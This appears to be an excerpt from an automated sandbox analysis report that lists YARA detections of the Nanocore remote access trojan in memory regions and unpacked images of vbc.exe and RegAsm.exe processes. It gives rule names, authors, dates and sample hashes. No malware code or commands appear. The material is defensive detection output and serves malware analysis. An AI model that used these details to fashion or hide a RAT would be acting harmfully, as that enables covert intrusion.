          Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
